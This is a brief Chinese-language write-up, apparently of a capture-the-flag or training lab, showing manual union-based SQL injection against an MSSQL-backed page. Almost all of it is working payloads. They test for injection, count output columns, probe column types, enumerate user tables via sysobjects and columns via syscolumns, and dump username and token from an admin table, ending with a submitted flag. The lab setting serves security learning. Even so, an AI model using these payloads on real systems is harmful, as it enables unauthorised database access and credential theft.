判断页面是否存在注入:’ and 1=2 – qwe.页面不正常
判断输出位个数:‘ order by 3 — qwe,3个输出位.
输出位输出: 错误原因:MSSQL对输出位数据很严格.应该: ‘ union select 5,null,null — qwe 正常,说明第一个输出字段为整数. ‘union select 5,’a’,’a’ — qwe 说明第2,3字段为字符串.
对MMSQL猜表名: MMSQL的自带数据库表为:sysobjects 并且自己建的表的xtype是 ‘U’.’U’->’USER’ 所以注入时:’ union select 1,name,’a’ from sysobjects where xtype=’U’ — qwe 所以得到的表名为:admin
猜admin表的字段值: MMSQL自带的记录所有字段的表为: syscolumns. 而同一张表的id值是一样的. 所以找出admin表的id值:’ union select id,’a’,’a’ from sysobjects where name=’admin’ — qwe id:1977058079 所以找出admin表的所用字段:’ union select null,name,’a’ from syscolumns where id=1977058079 — qwe
直接找出值:’ union select null,username,token from admin — qwe zkaq{e9c9e67c5} 提交正确
